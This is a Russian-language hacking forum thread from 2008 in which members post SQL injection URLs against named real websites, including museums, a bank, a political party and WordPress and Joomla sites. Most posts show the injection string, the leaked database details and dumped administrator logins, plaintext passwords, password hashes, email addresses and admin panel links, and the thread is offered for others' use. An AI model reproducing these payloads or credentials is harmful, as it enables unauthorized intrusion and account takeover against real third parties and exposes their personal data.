HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 02.02.2008, 23:41
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.aiim.org/standards.asp?id=-1+or+1=@@version--

Microsoft SQL Server 7.00 - 7.00.961 (Intel X86) Oct 24 2000 18:39:12 Copyright (c) 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

http://www.aiim.org/standards.asp?id=-1+or+1=(select+system_user)--

aiimwebuser

http://www.aiim.org/standards.asp?id=-1+or+1=(select+db_name())--

CGIWEB
-----------------------------------------------------------------------------
lisenok.ru

http://www.lisenok.ru/look.php?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5/*

5.0.45-log/liseno_liseno/liseno_liseno@localhost


http://www.lisenok.ru/look.php?id=-1+union+select+1,2,3,concat_ws(0x2F,login,password ),5+from+users/*

логин/пароль
lis/skyweb
---------------------------------------------------------------------------
allurent.com

http://www.allurent.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,versio n(),database(),user()),9,10,11,12/*

4.1.20/allurent_prod_12507/allurent@localhost


http://www.allurent.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,user,P assword),9,10,11,12+from+mysql.user/*

root/


http://www.allurent.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,name,p assword),9,10,11,12+from+users/*

имя/пароль

allurite/d1fnt. pW*rD
 
Ответить с цитированием

  #2  
Старый 03.02.2008, 02:24
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию

http://pechatnick.com

version(): 5.0.45-log
user(): u8421@10.10.223.234 (masterhost; phpmyadmin.masterhost.ru; wmail.masterhost.ru)

Код:
http://pechatnick.com/users/index.phtml?uid=-1+union+select+concat_ws(0x3a,user_id,name,login,email,skype,pass,icq)+from+users+limit+0,1/*
админка: http://pechatnick.com/_admin/
login: tanya
pass: xxx

Последний раз редактировалось Basurman; 03.02.2008 в 02:27..
 
Ответить с цитированием

  #3  
Старый 03.02.2008, 02:44
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


Отправить сообщение для Momiji с помощью ICQ
По умолчанию

nmspacemuseum.org

Код:
http://www.nmspacemuseum.org/content.php?id=21'%20union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+limit+1,1+--+
4.1.20nmspacemuseum@localhostnmspacemuseum_live

Код:
http://www.nmspacemuseum.org/content.php?id=21'+union+select+1,concat_ws(0x3,user_name,user_pass,user_email),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users+limit+1,1+--+
adminNMMSH-01doug.patinka@state.nm.us
Админка: http://www.nmspacemuseum.org/admin/index.php
 
Ответить с цитированием

  #4  
Старый 03.02.2008, 02:50
WuWu
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344

Репутация: 48
По умолчанию

Код HTML:
http://www.photopips.com/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users
Код HTML:
http://www.zulan.se/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users
Код HTML:
http://www.pie2020.com/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users
Код HTML:
http://www.ilmanakbar.com/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users
Код HTML:
http://localize.org.ua/old/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users
Много хешей, не стал шифровать...


Код HTML:
http://zona.dp.ua/dir/index.php?ParentID=9999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5/*
5.0.33-standard
zona@10.0.0.1
zona
Код HTML:
 http://zona.dp.ua/dir/index.php?ParentID=9999+union+select+1,table_name,3,4,5+from+information_schema.tables/*
несколько интересных таблиц

Последний раз редактировалось WuWu; 03.02.2008 в 03:45..
 
Ответить с цитированием

  #5  
Старый 03.02.2008, 15:05
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662

Репутация: 435
Отправить сообщение для Sharingan с помощью ICQ
По умолчанию

Код:
http://www.frontnational.com/communique_detail.php?id=-1+union+select+1,2,concat(database(),0x3a,user(),0x3a,version()),4/*
frontnatfn:frontnatfn@10.0.61.118:5.0.44-log


Код:
http://www.itd.cnr.it/news.php?ID=-41+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3,4/*
5.0.22-Debian_0ubuntu6.06.5-log
находим интересные таблицы, типа t_admins
и собственно там и находим админа
Код:
http://www.itd.cnr.it/news.php?ID=-41+union+select+1,2,3,concat(username,0x3a,passwd),5,6,7,8,9,0,1,2,3,4+from+telma2.t_admins/*
admin:21232f297a57a5a743894a0e4a801fc3
bettina:ACB4A77114F483CE965A7D55A61D0E4B
судя по базе log: pass
admin:admin

Последний раз редактировалось Sharingan; 03.02.2008 в 15:07..
 
Ответить с цитированием

  #6  
Старый 03.02.2008, 21:06
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.coreyholms.com/portfolio/project.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8,9/*

4.1.20/coreyholms_db1/coreyholms@localhost
-----------------------------------------------------------------------------
taylormarsh.com

http://www.taylormarsh.com/archives_view.php?id=-1'+union+select+1,2,3,4,5,6,concat_ws(0x2F,version (),database(),user()),8,9/*

4.1.20/taylormarsh/taylormarsh@localhost


http://www.taylormarsh.com/archives_view.php?id=-1'+union+select+1,2,3,4,5,6,concat_ws(0x2F,usernam e,password,email),8,9+from+users/*

логин/хеш/мейл
tmarsh/959b43c9d1b14f6281eceea6e1762370/taylor@taylormarsh.com
 
Ответить с цитированием

  #7  
Старый 03.02.2008, 23:00
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


Отправить сообщение для Momiji с помощью ICQ
Red face

koreateacher.com
Код:
http://www.koreateacher.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
5.0.45koreateacher@localhostkoreateacher
Код:
http://www.koreateacher.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,username,password,id),null,null,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mos_users/*
turk_the_ripperf653d1fcff57e27242cd72ba617120256 2
http://koreateacher.com/administrator/index.php

riac.ca
Код:
http://riac.ca/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,version(),user(),database()),null,null,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users/*
5.0.33-standard-mpbriac_joom1@localhostriac_joom1
Код:
http://riac.ca/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,username,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users/*
admin28b84c0788be703904d31af1027553faadmin@riac. ca
http://riac.ca/administrator/index.php

israeltown.com
Код:
http://www.israeltown.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,version(),user(),database()),null,null,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
4.1.22-standardisraelto_mambo@localhostisraelto_mambodb
Код:
http://www.israeltown.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,username,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mos_users/*
admin0e17fe383fffa9118672142fc5033cdcadmin@israe ltown.com
http://www.israeltown.com/administrator/index.php
 
Ответить с цитированием

  #8  
Старый 04.02.2008, 00:22
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
По умолчанию

phpbb forum

Цитата:
http://rc-aviahobby.butovonet.ru/RCgallery/index.php?cat=-1+union+select+1,concat_ws(0x3a,user_id,username,u ser_password,user_email,user_level),3,4,5,6+from+p hpbb2_users/*
 
Ответить с цитированием

  #9  
Старый 04.02.2008, 16:01
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

kunzweiler-international.com
Код:
http://www.kunzweiler-international.com/print.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user()),2,3/*
4.0.27-log : DB168348 : U168348@saveloy.stor

horizons.gamersinfo.net
Код:
http://horizons.gamersinfo.net/guides/default.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4,5,6,7,8/*
4.1.15-Debian_1ubuntu5-log:gamers_horizons:gamers_dbus3r@192.168.0.18

DifusionJuridica.es
Код:
http://www.difusionjuridica.es/HTML/bar/default.php?id=-1+union+select+null,version(),null--
PostgreSQL 8.1.9 on i486-pc-linux-gnu, compiled by GCC gcc-4.0.gcc-opt (GCC) 4.0.3 (Ubuntu 4.0.3-1ubuntu5)

Здесь все табы:
Код:
http://www.difusionjuridica.es/HTML/bar/default.php?id=-1+union+select+null,TABLE_NAME,null+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+184+OFFSET+1--
Кому интересно - посмотрит поля сам...
 
Ответить с цитированием

  #10  
Старый 04.02.2008, 16:03
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
http://www.to-rent.ru/contact_info.php?id=-19062+union+select+1,2,3,concat_ws(0x3a,password,l ogin,is_admin),5,6,7,8,9,0,1,2,3,4,5,6+from+u32388 .vip_users+limit+0,1/*
5.0.45-log
admin:lifevfcnth
-----------------------------------------------------
Цитата:
http://www.moloprom.ru/editorial/new/?year=2008&month=1&newid=-629+union+select+1,2,3,4,5,6,7,8,9/*
табл с пассами нету ((
-----------------------------------------------------
Цитата:
http://www.ctdlock.ru/products.php?item=-909+union+select+concat_ws(0x3a,login,pwd),2+from+ users+limit+0,1/*
standart@ctdlock.ru:dab4b2d3a9e56590b9d54e6ab2d252 ea:ge1954
http://www.ctdlock.ru/admin
пасс не подошёл - а может логин ((
-----------------------------------------------------
Цитата:
http://www.michinokubank.ru/index.php?page=240&id=-41+union+select+1,concat_ws(0x3a,login,password),3 ,4+from+users+limit+3,1/*
http://michinokubank.ru/admin
FalinA:FalinA
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ